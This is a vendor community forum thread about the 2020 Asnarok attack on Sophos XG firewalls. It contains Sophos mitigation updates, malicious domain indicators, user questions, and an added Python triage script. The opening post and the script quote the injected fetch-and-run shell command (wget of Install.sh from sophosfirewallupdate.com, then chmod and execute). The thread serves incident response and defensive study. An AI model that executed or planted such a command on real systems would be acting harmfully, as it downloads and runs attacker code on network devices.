
XG firewalls connected to SFM were no longer able to connect or synchronize to SFM. - Notice the following change on the settings

Hello All,

Weird issue we noticed today: the XG firewalls connected to SFM were no longer able to connect or synchronize to SFM.

After looking at the settings on the XG firewalls affected we noticed that in place of the SFM IP address was this parameter: 

||cd /tmp/ && wget sophosfirewallupdate.com/.../Install.sh -O /tmp/x.sh && chmod 777 /tmp/x.sh && sh /tmp/x.sh|| 

After removing this parameter and pointing it to our SFM IP we were able to get that firewall to successfully synchronize and connect to SFM.

What I want to know is what could have caused that setting to change. No one from our team has made this change. I believe SFM templates do not have the capability to push this setting.

This is very concerning and alarming, and I would like to know if anyone has any ideas or where to look. I already opened a case with Sophos and was on the phone with them for about 3 hours reviewing and grabbing logs. Thoughts on this! - Attached is a screenshot of one of the XG firewalls.

This thread was automatically locked due to age.
  • Update 2020/04/25 01:00 Pacific
    Please visit this KBA for more information.

    Update 2020/04/23 21:00 Pacific
    Earlier today, some customers reported a discrepancy in the SFM server address field on their Firewalls. Sophos provided initial steps to mitigate the issue and this update provides additional recommendations as we continue to investigate the issue and corrective actions.

    The symptom suggests potential unauthorized access. The following mitigations have been confirmed to eliminate the issue while we automate a software-based remedy.
     
    1. The issue can only manifest itself on systems that have exposed the HTTPS admin services or the User Portal on the WAN interface. To prevent this issue, choose the “Administration” link on the left-hand navigation panel of the management console, to get to the “Device Access” page illustrated below where customers must ensure that both Admin services and User Portal are deactivated on the WAN interface as highlighted:



      Note: If you currently rely on WAN-based Admin services, we recommend you have configured one of the following BEFORE deactivating these services:

      Administering your Firewall via Sophos Central (recommended):
      https://community.sophos.com/kb/en-us/127461

      Administering your Firewall via Remote Access VPN:
      https://community.sophos.com/kb/en-us/133109

      Sophos Customer Support is available to assist you in completing the steps above as necessary.
      Please reach us at: https://secure2.sophos.com/en-us/support/open-a-support-case.aspx

    2. Affected firewalls have been observed communicating with the following list of unauthorized hosts. Add all the following domains (these are not Sophos domain properties) as DNS host entries and define the IP address as 52.214.97.178 (a Sophos property which will eliminate the unauthorized traffic):

      • sophostraining.org
      • sophosproductupdate.com
      • sophosenterprisecenter.com
      • sophoswarehouse.com
      • Ragnarokfromasgard.com
      • sophosfirewallupdate.com
        For assistance on adding these domains as DNS host entries, please refer to these instructions.

    3. Contact Sophos Support by phone or email to open a case. We will ensure you receive any future communications on this issue.

     

     Additional screenshots for reference:
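A triage script for the two observations in this thread: the shell-command string found in place of the SFM server address (quoted in the opening post) and the six unauthorized domains listed in the Sophos update above. This is an added example written for this page, not Sophos code or any tool mentioned in the thread. It assumes you can export the SFM server field from each firewall's configuration and have DNS or proxy logs to search; the log line format, the sample log lines, and the hostname and domain regexes are assumptions made for the example, not anything the firewall or SFM produces.

```python
"""Added example: triage helpers for the symptoms described in this thread.

Not Sophos code.  Two independent checks:
  1. sfm_field_is_suspicious(value): True when the SFM server address field
     holds anything other than a bare host, IP literal or host:port, which is
     how the injected `||cd /tmp/ && wget ...||` string shows up.
  2. find_ioc_hits(lines): scans DNS/proxy log lines for the six domains
     listed in the Sophos update, matching subdomains and ignoring case.
The log line format is an assumption made for this example; adapt
DOMAIN_TOKEN_RE or pre-extract the queried name from your own logs.
"""
import ipaddress
import re

# Domains from the Sophos update (not Sophos properties), normalised to lower case.
IOC_DOMAINS = {
    "sophostraining.org",
    "sophosproductupdate.com",
    "sophosenterprisecenter.com",
    "sophoswarehouse.com",
    "ragnarokfromasgard.com",
    "sophosfirewallupdate.com",
}

# The value the opening post found in place of the SFM IP address.
INJECTED_VALUE = ("||cd /tmp/ && wget sophosfirewallupdate.com/.../Install.sh "
                  "-O /tmp/x.sh && chmod 777 /tmp/x.sh && sh /tmp/x.sh||")

# RFC 1123 style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.IGNORECASE)

# Anything a shell treats specially.  A legitimate hostname never contains these.
SHELL_METACHARS = ("||", "&&", ";", "|", "`", "$(", " ", "/", "\\")

# Rough "looks like a domain name" token matcher for free-form log lines (assumption).
DOMAIN_TOKEN_RE = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.IGNORECASE)


def _valid_host(host: str) -> bool:
    """An IPv4/IPv6 literal or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(host))


def sfm_field_is_suspicious(value: str) -> bool:
    """Return True if the SFM server address field is not a plain host[:port].

    Shell metacharacters are rejected before the hostname grammar is even
    consulted: a legitimate address never contains them, and their presence
    is exactly the signature the opening post describes.
    """
    v = value.strip()
    if not v or any(tok in v for tok in SHELL_METACHARS):
        return True
    if v.count(":") == 1:            # host:port form (IPv6 literals have more colons)
        host, port = v.split(":")
        if not (port.isdigit() and 1 <= int(port) <= 65535):
            return True
    else:
        host = v                     # bare hostname, IPv4 or IPv6 literal
    return not _valid_host(host)


def ioc_domain_for(name: str):
    """Return the matching IOC domain if `name` is one of them or a subdomain, else None."""
    n = name.lower().rstrip(".")
    for d in IOC_DOMAINS:
        if n == d or n.endswith("." + d):
            return d
    return None


def find_ioc_hits(lines):
    """Return [(line_number, ioc_domain), ...] for lines that reference an IOC domain."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        for token in DOMAIN_TOKEN_RE.findall(line):
            d = ioc_domain_for(token)
            if d:
                hits.append((lineno, d))
                break                # one report per line is enough
    return hits


# Constructed sample log lines for the example (not real logs from the thread).
SAMPLE_LOG = [
    "2020-04-04T08:12:31Z dns query client=10.0.5.23 qname=sophosproductupdate.com qtype=A",
    "2020-04-04T08:12:32Z dns query client=10.0.5.23 qname=www.sophos.com qtype=A",
    "2020-04-22T23:40:01Z proxy GET http://sophosfirewallupdate.com/ client=10.0.0.1",
    "2020-04-23T01:02:03Z dns query client=10.0.5.40 qname=updates.RagnarokFromAsgard.com qtype=A",
]

if __name__ == "__main__":
    for candidate in ("10.1.2.3", "sfm.example.internal:443", INJECTED_VALUE):
        verdict = "SUSPICIOUS" if sfm_field_is_suspicious(candidate) else "ok"
        print(f"{verdict:10} {candidate[:60]}")
    for lineno, domain in find_ioc_hits(SAMPLE_LOG):
        print(f"line {lineno}: {domain}")
```

The field check deliberately fails closed: anything that is not a hostname, IP literal or host:port is reported, so a typo in a legitimate address also gets flagged and should be reviewed by hand rather than ignored. The log scan matches subdomains because the update lists registrable domains, and a resolver log will usually show the full queried name.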

  • I was referred to this post by Sophos support due to the issue linked below:

    https://community.sophos.com/products/unified-threat-management/f/network-protection-firewall-nat-qos-ips/119975/advanced-threat-protection-triggering-on-sophosproductupdate-com

    A question they have yet to answer is why are we being asked to associate domains that Sophos does not own to an IP that also has unknown ownership? I was sent to this post without any clear explanation of why it should be followed. Can anyone here clarify why the dns override above was proposed? 

    Thanks,

    D.V.

  • I suspect we'll find out they hard-coded some URLs into their appliances or SFM and either didn't register them or stopped registering them (hangover from UTM?).

    Most of the domains were newly registered on 28th March, so someone either got lucky or found them and registered them.

    100% sure the IP is in control of Sophos, which is why they are asking to redirect there so the update mechanism downloads an empty file.

  • Hello Marco,

    could you please explain to me how it is possible that the XG Firewall obtained EAL4+ certification when it is leaking from all sides?

    I'm sorry but I really can't understand it. Perhaps only that obtaining this certification was very, very expensive ...
    I think you understand what I mean?

    Regards

    alda

  • I'd also like to ask why the only notification of this issue was posted to the Community forums and not e-mailed directly to partners and end users upon discovery? Not everyone watches these forums 24/7. This should not be the official place to release these notifications.

  • Also, do we have to worry about saved credentials for things like AD/LDAP servers?   Can you please share a copy of x.sh so we can understand what actions were executed?

  • Hi AdamBasalyga,

    We will soon release more details of the attack and its payloads. Please follow https://community.sophos.com/kb/en-us/135412 for further updates.

  • I look at this:

    Affected firewalls have been observed communicating with the following list of unauthorized hosts. Add all the following domains (these are not Sophos domain properties) as DNS host entries and define the IP address as 52.214.97.178 (a Sophos property which will eliminate the unauthorized traffic):

    • sophostraining.org
    • sophosproductupdate.com
    • sophosenterprisecenter.com
    • sophoswarehouse.com
    • Ragnarokfromasgard.com
    • sophosfirewallupdate.com
      For assistance on adding these domains as DNS host entries, please refer to these instructions.

    And found that some of our desktops were communicating with some of these addresses as early as the 4th of April.

    Seems abnormal to me. Did XG leak from WAN to make it to our desktops?

    Please a quick response.

    Paul Jr

  • After analyzing the components and intent of the attack, Sophos published a SophosLabs Uncut article, “Asnarok” Trojan targets firewalls, to share its current understanding of the malware.

  • Hi Yashraj,

    Thank you for these instructions. I have followed them and implemented them on my firewall. I have also enabled the hotfix auto-install as per the instructions in the links

    https://community.sophos.com/kb/en-us/135415 and https://community.sophos.com/kb/en-us/135412

    However, the hotfix has not applied yet despite several reboots of the firewall. Customer support has requested the firewall access ID for 1 week, which I have sent. I hope they can fix it as soon as possible. Interestingly, two of my machines were attacked by Ragnarök ransomware on 29th April 2020; would this be associated with this vulnerability? We have been investigating and now have logs from the Kaspersky endpoint. If interested I can forward the logs.

    Kindly also send instructions on how I can add a one-time password for remote access users.

     

    Regards,

    Nicholas.